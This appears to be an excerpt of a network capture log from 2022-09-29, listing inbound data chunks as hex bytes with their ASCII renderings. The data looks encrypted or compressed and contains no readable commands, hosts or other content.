                                                                                                                                                    2022-09-29 12:59:14 UTC25879INData Raw: c3 d6 62 c0 f6 6c 1b 8c 86 27 af 14 f0 65 f5 7d 19 d8 89 71 ef a7 86 7a 73 98 35 84 06 b8 69 52 d0 d6 b2 58 aa 7a f4 9d 5e 8c b5 8c 8d 4b 01 aa 76 66 9b bd 42 0d b2 a3 10 10 34 fe e5 07 49 29 41 41 82 7a 7e e2 ad d6 ab 5a bf cd 74 63 93 fb 1b c3 8e 4c a0 2c d8 53 27 c7 0b c8 cf 88 c7 66 06 5a 33 cc ca 30 32 d5 c0 6f 63 c9 7f a8 16 34 e8 21 a3 fe 9f 7b c3 9f 35 2b a2 ff 01 49 31 1c 4d 63 64 24 35 af cf 93 fc 41 6b 22 c9 e4 0f dc 14 a6 31 c2 31 1f 85 e0 62 3f 68 c9 72 eb 27 9e d5 07 38 4e ce 0f ba c1 e6 d3 71 bf 12 c1 20 6c 09 0e a1 6c 25 aa 65 04 9a 47 53 da ff 1b 2c c5 f5 b5 87 4c 80 3d 68 0b 9a 04 54 9a ea a5 5e 2f 61 7f 9d 6a c4 f1 bc a4 7c 97 19 d4 0a 18 dd 38 0a 0f f0 cc 85 5e 3f 7b 95 49 9a c6 60 76 70 45 50 0c 4f ca cc ad 94 53 79 a8 0b 6a 4d 1d f1
                                                                                                                                                    Data Ascii: bl'e}qzs5iRXz^KvfB4I)AAz~ZtcL,S'fZ302oc4!{5+I1Mcd$5Ak"11b?hr'8Nq ll%eGS,L=hT^/aj|8^?{I`vpEPOSyjM
                                                                                                                                                    2022-09-29 12:59:14 UTC25895INData Raw: 7a b9 1b 76 fd 5e 25 af d0 e6 21 55 91 23 d3 51 71 19 29 e2 66 81 41 01 22 72 50 56 c1 33 11 b3 f6 aa 95 b6 bd e0 5e f4 cc 46 64 08 71 b6 3e 92 4e d8 0c b7 17 51 2a b9 db 87 1f d3 b2 5e 5f 9b 02 dc 6d e9 2c 4d a2 50 b7 7f e1 d8 4f ea 4f d7 0c 6a 1a 27 a6 a7 e0 69 d2 d5 51 95 42 a7 33 ca 34 fd 44 ce b9 f8 2b 75 a0 7a 8e a9 f8 4d 01 5e f5 a4 dd 34 c2 35 d3 95 0b 3f a2 32 e2 f0 b9 bf 40 9c 76 b2 28 04 33 09 8e 3e f6 11 bc 7d 9b 17 46 73 2d b9 c0 fb c1 e4 1a c7 4e da db 6d 39 1a ad bd 58 70 ea 4d 6d bb 8d c4 93 df a6 1d 43 2f 2b 2d 2c 1b 7a 0f d2 e8 3e 73 f0 e7 1b 4e bc af 11 f0 ed f6 83 3b 52 2b 90 da eb 4a 26 35 ef 56 53 b3 7c ce a1 e3 ee 0a ec 45 0b aa d0 15 63 33 aa 0f 3f 8f 55 94 5b a0 3e 1b 92 4d 11 0d 64 6a e2 33 e7 79 db d5 d2 e0 3c 7d ef 3a a9 38 83
                                                                                                                                                    Data Ascii: zv^%!U#Qq)fA"rPV3^Fdq>NQ*^_m,MPOOj'iQB34D+uzM^45?2@v(3>}Fs-Nm9XpMmC/+-,z>sN;R+J&5VS|Ec3?U[>Mdj3y<}:8
                                                                                                                                                    2022-09-29 12:59:14 UTC25911INData Raw: 7c e1 94 a1 ae af 36 64 8d c2 a6 d4 95 3f fe 59 e3 f1 ab 73 36 7d 45 08 74 b9 93 f7 a3 be 10 ec f0 13 a6 a3 65 6e f4 ad 90 80 61 bd d3 fe 15 bc 0c 83 29 25 e3 35 69 3d 2b 82 8d f3 88 57 b8 8d e3 1c 0e 1f bc 9c b4 ca de a6 31 ca 78 c8 ed 25 a7 bb 43 d9 07 bb 49 89 df 75 1f 23 ae 4f ce 0e 05 73 bd e4 a9 25 1d 7f c8 1f 22 e8 13 ba da 1e 86 2f 65 69 01 12 ea fe 48 4c bd 45 3d 26 19 f9 ab b8 49 50 96 09 7d 20 19 27 26 b5 9b 03 51 30 82 81 1b 79 31 bd 33 59 5a fc ca 05 27 00 c6 45 37 49 88 ae 9b 30 c7 28 a0 94 f6 f9 0c f8 a4 09 43 f2 3e 30 c7 63 37 22 75 6d 16 d7 33 42 51 b2 38 9a 82 4b cb db fe 2b 9e 03 8d e6 e2 23 a0 8c 4c 3e 1b 00 ac 50 a3 14 52 2e 93 99 85 bc 41 0d 43 1f 86 3c d6 66 07 e8 db aa 57 aa 52 c2 53 46 bd f4 8d 32 36 dd 13 ca 37 0d 50 bb 18 18 9a
                                                                                                                                                    Data Ascii: |6d?Ys6}Etena)%5i=+W1x%CIu#Os%"/eiHLE=&IP} '&Q0y13YZ'E7I0(C>0c7"um3BQ8K+#L>PR.AC<fWRSF267P
                                                                                                                                                    2022-09-29 12:59:14 UTC25927INData Raw: 9f a4 4e fe a4 f1 59 20 ac 0c 07 84 36 45 61 31 90 eb 22 87 71 c9 4d ad 66 48 db 89 93 11 0e aa ac 82 b5 c3 8c 83 d4 5a a4 d6 e6 8f ca 4d 7a 51 2f 77 eb 25 bb 86 0a 73 38 e2 c6 6b 7e 1e fb 6b 96 93 a7 69 7c 67 a9 ee 81 10 0d 09 da 39 ab 77 21 0a db 46 9a 2a c8 64 bf d4 75 81 cf 72 23 f8 5d d9 74 67 1c 4f 2e e0 ba 46 37 d8 fe 2a 36 6f e7 21 cd 60 c5 67 51 27 37 94 14 0f b4 c1 e9 48 3c ae c5 c6 6e 0a 3b 10 d5 a7 85 6a c8 eb 19 c4 f5 37 ac 65 81 83 21 df 66 0f 55 cf 8d e8 48 33 b4 d9 a6 85 40 77 04 17 4a 85 dd 08 1f 39 c5 c6 63 a5 8f e4 a3 f4 9b 09 65 a8 d1 e6 cd e6 77 f5 b2 3b 4d 6d 02 44 fe a9 1b d2 a1 1c 82 79 95 9a 22 24 cd e2 d1 c0 19 cd 34 09 1a d7 03 08 a8 b9 bd 69 13 2d 98 ea 53 af 7b 00 16 c4 39 fc ea 06 e5 07 00 c8 1f cb 9e 06 58 29 da 26 fd c6 59
                                                                                                                                                    Data Ascii: NY 6Ea1"qMfHZMzQ/w%s8k~ki|g9w!F*dur#]tgO.F7*6o!`gQ'7H<n;j7e!fUH3@wJ9cew;MmDy"$4i-S{9X)&Y
                                                                                                                                                    2022-09-29 12:59:14 UTC25943INData Raw: c5 f3 ab 00 54 ed 47 be d7 7a 48 b0 1f ef 64 1f f7 a0 ce 68 bc e0 02 2f 15 c4 44 ef da 4b 4b ad f8 2d fc 17 67 17 36 81 11 3f 6f c4 04 0a 7a 26 84 45 01 99 0d 91 67 b6 6b 99 99 bf 2c ec 27 36 b5 d9 fd e8 60 17 88 b4 35 5e 0b d7 60 cf e6 ee 40 72 2c b2 a1 a9 3d ad 31 87 51 84 8d 18 4d 83 67 a0 eb 40 d5 c9 e7 c1 d1 cb 9b f0 a6 e5 bf 37 fa e6 93 da de cd bf 78 ab c0 d3 d1 06 47 07 dd ad 74 0e 46 7e bc d5 4d 53 79 74 77 62 db be 04 94 6b 2a 3d db 74 91 7c 4f 2e 43 83 e1 a5 31 2f 7d 4c 9a 5e b3 6e ca fb 7d 04 f5 7b e6 de c4 e5 bf 83 d1 75 4b 4b 4d b8 2d db 40 c1 a2 73 d2 7d d5 07 24 c9 88 af 62 24 01 61 e3 b6 c1 62 b2 65 55 9a 61 1d 1c b4 59 51 7a a3 57 8a 1f b9 6b 84 5e 03 5b fb f2 38 83 9f d7 72 e3 06 16 2b 1e 0a 0e 6e 82 8b 8f fd 21 69 16 e9 be 4c d8 c9 3f
                                                                                                                                                    Data Ascii: TGzHdh/DKK-g6?oz&Egk,'6`5^`@r,=1QMg@7xGtF~MSytwbk*=t|O.C1/}L^n}{uKKM-@s}$b$abeUaYQzWk^[8r+n!iL?
                                                                                                                                                    2022-09-29 12:59:14 UTC25959INData Raw: be fc 46 1e 9a 51 9c 91 81 e0 ad 28 99 19 04 6e b8 ff f2 c4 14 f5 0b a6 10 b1 b9 16 7c 68 25 c6 dd 12 4c d9 2a 3c 15 e9 cd ae e0 bc db 0d 2d 74 c3 f3 9e 63 e4 ca 93 be 54 96 89 3f 30 c7 ea 93 bf de 06 f6 23 44 1f 4e 10 f4 09 ff 89 f9 49 97 0b dc 1c 03 62 b8 cc a6 80 14 7c 84 6e 69 27 dc 4d 42 7a 8e d2 d8 37 7b 50 c0 63 38 f6 15 ee 46 9c 1d 59 2f 8b 59 74 64 19 df 0a 0a 84 ca cf 2f 9a 4f 29 61 5e ae ed 2c 13 f6 41 96 a2 57 a3 84 0a 92 37 93 07 58 cd 82 60 99 09 66 64 61 7f 02 eb 88 c8 fe 4f 95 79 0a 44 c5 18 5e f0 81 fd 2b fc cd f2 77 9f 77 0e 2c 60 15 30 e0 f4 ee 19 25 7a c4 4e 3e a4 4f 91 d0 33 ad 3f f1 ae f2 38 c3 22 6b 1c c0 33 7e 27 99 02 ef 53 18 b2 9a 44 06 da d2 d2 90 74 bb c9 3a 22 3a 5f e1 8e c7 9c f5 3f 06 5b b7 bc dc 62 c9 38 6f 75 21 c5 c0 c9
                                                                                                                                                    Data Ascii: FQ(n|h%L*<-tcT?0#DNIb|ni'MBz7{Pc8FY/Ytd/O)a^,AW7X`fdaOyD^+ww,`0%zN>O3?8"k3~'SDt:":_?[b8ou!
                                                                                                                                                    2022-09-29 12:59:14 UTC25975INData Raw: 95 72 1a b2 ec 52 6a 04 f0 b8 01 1b 6f 0b 2a ad 0f ef 6f 24 34 17 e4 98 e4 e6 5a 71 57 44 49 01 d0 ab ba c5 a5 a4 cb 57 30 fb 5f 4f 5f 4d ca b9 3a 82 ce ff c8 a2 cd 9c b6 9a 80 40 4e c4 f5 22 1e 46 81 3d 91 96 42 2e a8 28 da 11 52 eb d2 73 02 2a e1 80 d5 c2 bc 3a 86 52 ee 71 57 63 cd 29 f5 2b 08 d3 65 4f f3 82 ff 37 c8 ed d9 ff dc 83 cb 7f fc ba d6 53 67 74 f6 9e 8d 7e 47 d5 d2 a1 a6 c2 b5 0a 0f a1 0f c5 44 2e 6a 9f 37 23 52 57 28 d7 4e f8 00 d9 2f 89 19 dd 64 8c 7d 73 53 24 3b de f3 9d 6b 40 b8 a4 21 0b b9 55 d6 13 35 53 db 60 ff b2 be 33 44 2e c4 de cf 32 9a d0 35 e6 7e 79 3e c9 ca ec 44 48 23 8a 4f ef b5 06 b8 39 96 c9 6f 6f 94 3a 84 b7 1a 6a dd 8a 16 fa 29 c8 fd 59 2a b6 43 ce 14 65 a9 82 f8 44 d0 1f 31 78 25 7b 4e 35 98 ff 16 43 a4 36 08 51 eb cf c2
                                                                                                                                                    Data Ascii: rRjo*o$4ZqWDIW0_O_M:@N"F=B.(Rs*:RqWc)+eO7Sgt~GD.j7#RW(N/d}sS$;k@!U5S`3D.25~y>DH#O9oo:j)Y*CeD1x%{N5C6Q
                                                                                                                                                    2022-09-29 12:59:14 UTC25991INData Raw: 5b d4 b1 15 99 3e e2 4a 55 d7 3c ea 68 b8 aa b9 e8 49 29 0a 72 4a 11 29 2b 0d c8 f2 21 72 0a 91 71 ca 45 90 ba df dc f7 43 4a d4 29 0b 67 78 ac 51 e8 2c 88 0e 5a 15 51 a6 ca b2 63 9e bb fe 15 b5 98 57 32 a5 c0 60 71 a2 a3 28 7a f7 70 5d ab e0 bd fa a3 22 ce b2 fb 8d 68 c7 a4 2d 85 c9 0f da 01 3e f1 99 89 70 21 83 53 e3 88 be ec 47 2f d4 69 25 bd 5d b2 db 36 4d 6c 7a 20 50 19 e9 e4 4f 9b e2 eb de f4 b3 9a 60 cd c4 47 3d 52 31 07 1f b8 1b e1 ec 49 46 a6 0d 41 be 49 39 dd 72 db a1 77 d8 12 58 25 5b d1 d8 5e 8f 2f 92 d9 f3 4a 3e f3 79 af a8 e1 6e 33 ec 4e 0c 27 84 ad 9a c4 2d b5 6b dc 42 58 eb 8b bc 26 29 b8 e9 fd 10 f5 e4 93 2f 7a 9e 48 5b f3 a6 c7 46 04 e1 0c 8d 3a d1 07 d3 ab 52 ed 17 cb 51 a3 1c a4 d3 a6 0f 46 fc 32 b3 51 39 a1 ce fe 10 f7 fe 4e 42 e8 7b
                                                                                                                                                    Data Ascii: [>JU<hI)rJ)+!rqECJ)gxQ,ZQcW2`q(zp]"h->p!SG/i%]6Mlz PO`G=R1IFAI9rwX%[^/J>yn3N'-kBX&)/zH[F:RQF2Q9NB{
                                                                                                                                                    2022-09-29 12:59:14 UTC26007INData Raw: ef 2b db ee 52 59 04 70 96 92 bf 63 5d 41 ad c7 5b 68 e0 2e 6e 29 39 e7 33 a7 3c 9f ef 54 5a f7 5d 8a 5f b1 66 b8 3d 68 20 fd d7 40 6f 59 88 36 ae 37 e7 a3 69 46 c1 50 4f 73 f1 fc cb fc 29 d6 8c 70 43 d1 e8 d6 dc 20 e3 b7 ae 89 e2 21 15 10 cc b0 61 c6 5c b4 14 b1 65 f6 07 12 d4 39 b0 c4 dc f0 ae 72 e6 36 53 dc c9 e0 ea 59 ae 34 19 4d 8b 88 2f 83 da a1 98 71 ca ac b9 87 5d 64 0d e8 c5 b4 f6 80 1d 1a 6e 38 11 6c 3c e3 fa 09 3e 9b d2 97 04 e8 65 51 ba 9f a2 d1 13 a3 f4 e5 0f 41 4c 5a 5d 29 f1 cb 20 e5 da 6b 83 fb ed 45 b4 e5 8d 51 67 a3 84 1c aa 7b 38 9a 85 28 9f 76 57 36 04 d7 5b 0a 46 6d fd e4 13 15 fc 90 c2 2b 73 09 12 9e 7b a2 7f 77 b4 20 81 db 52 a6 83 b9 9c 65 c0 f2 c9 1d e6 c9 d8 ba 0c e3 1a 59 7c 04 bd f0 15 8b 78 ed b1 b3 a5 b5 2a 68 ae f4 39 3c 3a
                                                                                                                                                    Data Ascii: +RYpc]A[h.n)93<TZ]_f=h @oY67iFPOs)pC !a\e9r6SY4M/q]dn8l<>eQALZ]) kEQg{8(vW6[Fm+s{w ReY|x*h9<:
                                                                                                                                                    2022-09-29 12:59:14 UTC26023INData Raw: 4e d0 6c cd ce 9c c9 14 94 53 13 b1 92 87 a9 e8 a9 31 74 15 36 3c 21 bb e4 85 b7 c2 ee 9f 82 40 30 d2 a2 5a 55 be 85 79 df 7c 42 e3 5c 1b 20 f7 6d 11 0d 52 8a 31 1d 65 88 d9 e3 53 f2 d6 de 97 f2 f2 e0 7d 39 f6 12 0f 52 9c 2b 67 c1 a1 b6 98 7e a5 4f 6d af fc 5c c4 6c e1 32 6a 4a 05 75 b6 9b ca 1f a2 d8 39 43 70 11 1a c1 87 18 fa 53 e9 78 d0 34 27 2d 22 58 21 3c 7e 37 91 6f 9b cc 7d b2 0f 78 97 45 32 d0 12 f6 b2 b8 76 1b 6c 06 45 f4 8e cd 2d 0c b2 bd b3 27 04 2f a6 0c 10 5a 7e 6e fe 73 aa 0e 26 8f b2 49 32 81 18 7d fd dc a3 89 85 c2 5a a2 f2 0e 6d bf 42 1f 54 25 1e a9 1e f7 a2 3b 6a e3 9d af fa 50 a2 7d e1 e2 4c 3a c9 82 97 27 54 f9 ec 58 c6 a2 7e c7 7b db c9 8a 01 66 85 1b 88 28 ab 7d a4 94 b9 18 fa 81 9b ff e5 87 76 20 a5 df fc e3 91 c7 bd 12 b0 08 bc d9
                                                                                                                                                    Data Ascii: NlS1t6<!@0ZUy|B\ mR1eS}9R+g~Om\l2jJu9CpSx4'-"X!<~7o}xE2vlE-'/Z~ns&I2}ZmBT%;jP}L:'TX~{f(}v
                                                                                                                                                    2022-09-29 12:59:14 UTC26039INData Raw: 2d ca cf aa 45 ce ab 34 4b 32 7a 52 cd af bb fa 3f b3 e5 74 2d 55 a4 b1 1e 68 53 ab 73 8b e4 ba 1c f5 f6 87 9c a3 23 86 36 1f 4e 8a ee f4 01 84 45 b7 d1 b7 d6 fd 4d e8 07 e6 0a d3 c5 bd d6 52 dc c3 95 a2 32 56 17 af 1c f4 75 fe 71 a7 d5 1f 44 41 c7 4d 7b 4c 6a 9a e7 b3 bf 59 7b d0 f2 fd 73 60 75 4b a4 90 df 85 29 7d e8 d1 bc fa d4 05 b6 1e 80 ae b5 8a 6b ea ea a2 ca 4d 4f 25 80 79 63 df 36 00 f3 96 c1 b7 d1 b7 2d a9 2d fb e2 5a 94 ef 1b 9d eb e5 3b 9d 37 45 5d dc ee d7 ff 52 6d 25 a1 c5 57 66 d3 bd f8 ab a7 a6 bc 4d c8 41 b8 36 64 5a 5c 48 82 8e bc 36 84 ff f1 6e 5c 64 ed a3 08 cf d5 35 a4 45 64 e3 76 8b ae 38 76 2f df a3 47 4e d6 da 05 6a 04 29 30 f9 f8 78 13 23 70 d7 4e 09 85 6f d1 42 a5 66 48 99 9a 23 41 a0 0d a4 b5 e8 d5 86 cb a6 e9 85 a6 0e 3b 58 c9
                                                                                                                                                    Data Ascii: -E4K2zR?t-UhSs#6NEMR2VuqDAM{LjY{s`uK)}kMO%yc6--Z;7E]Rm%WfMA6dZ\H6n\d5Edv8v/GNj)0x#pNoBfH#A;X
                                                                                                                                                    2022-09-29 12:59:14 UTC26055INData Raw: 50 ec 53 63 12 7d 5e 98 9c d1 20 75 8b 07 c5 98 79 17 97 84 63 5f 58 c0 62 e1 72 b6 75 40 9e 3d b8 2a 86 e1 34 94 39 e8 43 ea 4d 89 55 fe f4 0e fb 4a 1e d9 9b de 70 2f 5e 6f b3 f6 c4 15 07 8c 95 77 d6 41 a1 25 a8 08 a8 71 13 5a 3f 9a c9 5b 01 f4 c3 d3 60 d8 5f 7e 21 37 8e bf 66 72 0b fc f5 51 bd f2 8a 9a 08 51 ca 34 1f cd f1 de e6 70 8c 57 03 a5 90 db 8c 7d d3 c2 bd 29 a6 0a 12 18 e4 22 97 a8 e2 36 13 ba 42 82 59 74 d0 27 4b 2a 5a 1a 87 96 f6 02 ea ea 49 c8 4c ac 24 92 79 84 86 2f 4d 84 45 12 c9 52 dd ad 51 87 ee 27 d5 60 d3 b4 b5 85 36 a8 a3 74 aa b2 7b 33 99 4b e8 85 b2 7a dc ec d4 fa ee 2b 37 3e 52 5b a1 79 74 b7 5d 4b 2f 70 b6 22 83 3b a3 71 31 9c 9c c5 b7 69 c5 f1 ab 40 c2 fd 26 b5 c3 88 73 ba 27 3e 04 9c 71 c1 59 1f 72 98 0c e8 4f 7a 1c 0f db 54 42
                                                                                                                                                    Data Ascii: PSc}^ uyc_Xbru@=*49CMUJp/^owA%qZ?[`_~!7frQQ4pW})"6BYt'K*ZIL$y/MERQ'`6t{3Kz+7>R[yt]K/p";q1i@&s'>qYrOzTB
                                                                                                                                                    2022-09-29 12:59:14 UTC26071INData Raw: 2b 3f 74 b5 30 c5 7b 76 ef 73 6f 33 8c 89 38 d5 be 3c ee 12 57 36 de 2b f4 2b 92 4c 77 e8 05 21 a2 89 aa e7 32 50 2b 7c 0b ac af 70 76 54 88 27 e6 00 0c 6e 84 9c a0 c3 f9 96 b4 67 71 9a c4 39 19 3a 53 49 60 d6 e7 79 4b 29 6a bb bf 85 b0 82 3a 9e 5c d7 ed 09 cc 4e 14 59 75 65 9f 42 3a d8 0e 97 99 f0 70 24 37 53 b8 2a ff 2d 05 44 77 45 2c b8 3e b4 a0 16 f1 36 6c 9b 52 78 a5 44 ad 25 26 6b de 78 0f 13 80 66 cc 28 4f fc 86 6a 9f cd cd 95 53 14 f4 17 95 ea 28 8f 8e 4d 21 c6 e1 fe 0c 6f ea 03 67 4a 40 b0 77 66 5d 59 8a 1d df 36 7b 9b 5a e0 23 bf 42 21 8d b6 d6 94 81 07 ad 3c 6e 23 5a 61 2e 79 58 3c 11 69 0e b4 c6 ba 11 f8 73 03 48 49 e3 33 3b c2 e3 55 43 e9 da 3f 1c dc 6e 64 81 4b 95 74 82 ce 4f 9b 8a 9f 63 b9 a3 e2 98 0b ed 52 6e 79 52 60 6f 7f c8 ae 60 a0 ab
                                                                                                                                                    Data Ascii: +?t0{vso38<W6++Lw!2P+|pvT'ngq9:SI`yK)j:\NYueB:p$7S*-DwE,>6lRxD%&kxf(OjS(M!ogJ@wf]Y6{Z#B!<n#Za.yX<isHI3;UC?ndKtOcRnyR`o`
                                                                                                                                                    2022-09-29 12:59:14 UTC26087INData Raw: 55 69 39 c2 61 d8 0b 6b 08 91 12 36 e1 c2 ca 0d 35 92 b8 89 f4 5f 0d b1 9d cb 4b da 1d ca b1 c0 a3 44 02 43 97 e7 9f b9 3b 7b 2a 08 fb 4c c8 77 e5 e3 52 6b e2 5e 9b 69 d3 90 07 b2 21 54 1c 05 84 1d 49 8e 53 40 21 82 fd 74 e5 06 ef c4 8f 5f 03 36 ed 43 8b 3d e9 50 4e 6e b0 b2 55 5e 78 b8 9a 9d e5 da 1b 60 cf 87 45 c3 a8 6d dd f1 c9 15 f3 b6 0a c3 0e 1e 4a 40 7e b8 e3 d5 6b 68 af 72 b5 53 0a 1e a1 ac 07 aa 41 ac 0f b6 ad 19 36 28 c5 c5 0c 01 aa 10 6e 75 d4 a3 8b b3 9b c5 65 9a 6f 23 e2 a7 78 04 2f 52 c6 dc 48 95 2b cc a7 4f f2 4c 25 a5 fb 8e 2f 76 45 33 f3 8f 57 40 5b 61 84 16 7f d6 41 1f 4b 83 3a 7e fc d3 8c d6 26 a0 a6 46 63 9b 6c 06 10 13 bc 7d 9f e7 93 3f 84 d4 0e 39 88 de 59 7d df f4 98 41 4b eb ff d4 b1 78 27 92 86 dd 10 79 a5 8d 41 19 e5 e9 ba ff b9
                                                                                                                                                    Data Ascii: Ui9ak65_KDC;{*LwRk^i!TIS@!t_6C=PNnU^x`EmJ@~khrSA6(nueo#x/RH+OL%/vE3W@[aAK:~&Fcl}?9Y}AKx'yA
                                                                                                                                                    2022-09-29 12:59:14 UTC26103INData Raw: f8 a8 25 d8 00 c0 bc af 5e b0 3c 9f fe 28 1a 3d ad 24 fd f5 56 b8 77 f3 89 e3 42 8b 7c 0a 41 4a f8 e9 54 db df 54 26 db dd 54 66 17 46 f7 db 07 be 51 e3 55 fa 92 d8 f6 91 01 1f a6 ed ff 6e 0b 14 13 1e 8d a0 c0 75 d5 14 78 c8 aa b4 9e 24 18 d8 27 ca 03 fc 26 84 07 18 f6 d7 fa f9 69 0a dc d2 4c c5 8d 40 7b 0a c7 ea 17 60 22 54 fe 84 d4 2e 20 15 40 d2 8f bc 2a a3 7a dd 3d c2 ee 4f c6 1a 60 19 10 f7 76 a0 0f 3b f8 98 83 0c b7 f6 b4 66 bf 89 0c b7 82 52 6e 6a cc 8a 3f 41 1f 46 1c d7 0b 4d 15 9f 55 30 d7 7c eb 45 74 8b 2e 97 bc 9d 67 5b 50 55 c4 ca 25 84 ae b2 43 51 cc 53 be 6f 1c ce 04 dc b0 52 29 b7 dc e5 7f 31 a9 f3 93 29 6a 85 e0 46 55 2c f0 5b 13 53 d5 4d cf 90 44 b2 8b d9 52 0b 28 b1 9c b2 af 33 34 14 c1 06 cc e3 59 93 4c ce 89 c9 09 06 f5 70 11 90 a3 85
                                                                                                                                                    Data Ascii: %^<(=$VwB|AJTT&TfFQUnux$'&iL@{`"T. @*z=O`v;fRnj?AFMU0|Et.g[PU%CQSoR)1)jFU,[SMDR(34YLp
                                                                                                                                                    2022-09-29 12:59:14 UTC26119INData Raw: b7 70 1a 6a 62 f7 a8 d4 77 54 b8 e2 22 90 7e 87 ea 05 38 88 b0 b4 86 5d 00 0f 1f dc 99 ee 22 34 3e 00 a2 40 12 ea 4a 2a 0c 83 93 d8 ea df b3 49 96 a2 cb 39 11 a7 68 03 75 69 ea 3c c5 0e c2 27 40 ee bd bb aa bb 10 b7 7a 96 bf 01 10 2a ae ef ca 59 a0 13 5f 12 49 d2 a4 28 49 39 2d d1 3e 25 81 9e 64 e0 29 d7 b6 95 96 09 ee f6 96 4f 47 b9 db 6a d7 b8 af 27 35 34 9a 28 32 28 d3 5b 90 8f 2f 71 f9 41 e1 75 f2 c4 65 2f 8b f3 18 74 8c 61 d8 df f9 1c 2e 6b 49 3e 54 5f a8 5f 15 2f e0 1e 70 74 30 b1 27 f9 79 87 99 4d c8 51 39 b2 50 bb 17 cd 3b 61 0d 3b c5 9d 92 74 1e 08 fd 54 bd 43 34 09 c7 9d 89 e3 97 1e 03 62 cd af 38 3d 8d f9 fc f7 a2 01 75 25 61 41 22 02 ec 54 b0 41 e1 e9 e3 33 32 a2 98 dc fa c2 66 11 1a fd 40 de e8 d8 fe 1d d5 df 85 43 c8 57 a3 b4 85 71 91 f7 56
                                                                                                                                                    Data Ascii: pjbwT"~8]"4>@J*I9hui<'@z*Y_I(I9->%d)OGj'54(2([/qAue/ta.kI>T__/pt0'yMQ9P;a;tTC4b8=u%aA"TA32f@CWqV
                                                                                                                                                    2022-09-29 12:59:14 UTC26135INData Raw: 16 79 36 f4 81 86 95 a7 73 b5 52 9e ab 08 9f ce fc a3 cf b0 fc 9a 19 23 9e ca b5 96 12 a4 19 96 ed 60 d9 f3 69 d6 f4 1b 3a b3 79 18 8f 86 26 e5 c5 4a 0f 3a 09 ac f7 6e 9a 88 73 c0 7b bf f6 cf 8c 61 bc 7e ff ec 92 f7 75 4a 09 32 99 db f6 3d 42 03 9c 6f bd 85 1b 8a be fd b6 2d e7 cd 38 8e ea 7f 5f 98 f9 13 52 92 1d f2 9f 07 90 6b 61 4b 0a 0a 91 64 0c 3d 49 c6 f4 64 96 c8 10 af db ed f3 21 86 5a 0e c6 ce 0e 98 75 cf 86 9d f8 67 d1 5d 1b c8 45 1c 4f b8 32 16 a7 6b 57 39 8f e3 ab 1d 83 7c b1 c8 a6 a3 0a 09 fb 05 e9 e9 ad 1d 42 83 f0 fa f6 75 70 93 f4 41 37 8a f8 7b 42 f2 41 e4 81 9f c9 8b 9b 07 d4 91 87 14 27 64 2a f3 9a f1 a2 64 f0 f7 28 c2 10 64 1d c1 10 a8 7f fc 13 93 dd cf 52 45 83 ca 94 ab b3 c1 0b 2b a3 75 be ce a0 ef 35 13 81 96 c3 bd a1 69 5b a2 1f 59
                                                                                                                                                    Data Ascii: y6sR#`i:y&J:ns{a~uJ2=Bo-8_RkaKd=Id!Zug]EO2kW9|BupA7{BA'd*d(dRE+u5i[Y
                                                                                                                                                    2022-09-29 12:59:14 UTC26151INData Raw: 63 44 d0 f3 4c f2 20 05 39 0d 24 e3 bc d4 37 d5 18 8f 05 8f ae e7 ab c6 e1 0d 6e f3 89 76 49 3b 50 5a 58 9b 59 82 23 fe a3 8f 52 3f 86 66 4e b8 bd 6b 25 09 85 28 ee 8e ee 69 42 12 73 04 ff 42 b1 a3 87 4d 13 a4 12 44 9d 5f 35 42 2c 19 bb 16 9f d7 73 fe 2d 91 b6 74 96 e9 0b 8e 90 30 12 a7 8c 65 e6 58 0c b6 06 7d 4d a3 97 f2 08 fc 9c 39 b2 a4 d0 8d 1c 28 07 72 a8 4a c9 f8 8c e1 1d 65 8b 90 e7 48 57 6a c8 a8 78 02 d9 71 dd 29 33 79 30 b4 d5 17 20 6d ad fe 72 89 67 bd f9 95 ed 85 2b 29 be ec a2 ee 82 bb 3b ea 8b 70 83 75 45 47 25 34 34 09 d6 d9 1b 03 db 42 56 fd c7 06 6c 4c 61 bc ad 48 87 5a f6 eb 88 5a d1 d7 32 61 7d f2 b8 6a 66 5d 1f cc 2c 12 d3 2f bf d2 e9 e2 e4 ec 7f a5 f2 0e 86 1f 74 ea 59 55 c9 2f dc 49 fe 13 50 6c 86 a0 92 91 57 26 e9 a8 4c d0 0a 11 e0
                                                                                                                                                    Data Ascii: cDL 9$7nvI;PZXY#R?fNk%(iBsBMD_5B,s-t0eX}M9(rJeHWjxq)3y0 mrg+);puEG%44BVlLaHZZ2a}jf],/tYU/IPlW&L
                                                                                                                                                    2022-09-29 12:59:14 UTC26167INData Raw: 09 d5 48 ef db 64 b1 ab 7d 48 3a 8d 19 54 6e af a0 a5 75 ca ef dd 0c 2f 65 63 90 24 09 1f 4c 3f 26 d9 41 a0 d9 b9 d9 de da 7a 34 2e 26 54 a7 b3 11 86 d0 78 00 d4 83 08 66 11 f6 c1 29 9a 3b 76 d1 73 a3 c2 c7 2c 9e b4 ad 1a ca b4 f8 20 03 dc 9c 21 22 a1 fa 58 2e cb e9 0e 9f 75 55 bc 6c 88 87 7d 01 24 c2 aa b5 07 a8 66 40 2e 1a 77 0c 23 1c ab 36 95 f2 0c 6e 3f 77 21 ba c1 11 42 0c b9 fa d3 62 69 66 05 7a af 54 64 11 0e 6f b6 fb 1d 46 45 7d 1f 1a a4 4e 27 da a9 7d 8c 6d 01 c4 be 83 dc bb c6 1e e8 86 df bf b2 51 61 96 53 31 e5 fc 11 a1 46 f8 3a 0e e7 a2 47 d6 52 10 c7 6d a4 c4 31 c9 ec d0 44 86 9c e7 d9 7d d4 b4 97 bc 74 f8 ef 99 a7 3c fa d2 3a 7a d9 04 d5 41 07 be 1b 7e a9 c2 25 a3 78 56 b5 13 06 7c 73 4c b4 cc 50 b6 3a cc bd 28 57 ba 3a 9c 44 d3 bb 38 a9 76
                                                                                                                                                    Data Ascii: Hd}H:Tnu/ec$L?&Az4.&Txf);vs, !"X.uUl}$f@.w#6n?w!BbifzTdoFE}N'}mQaS1F:GRm1D}t<:zA~%xV|sLP:(W:D8v
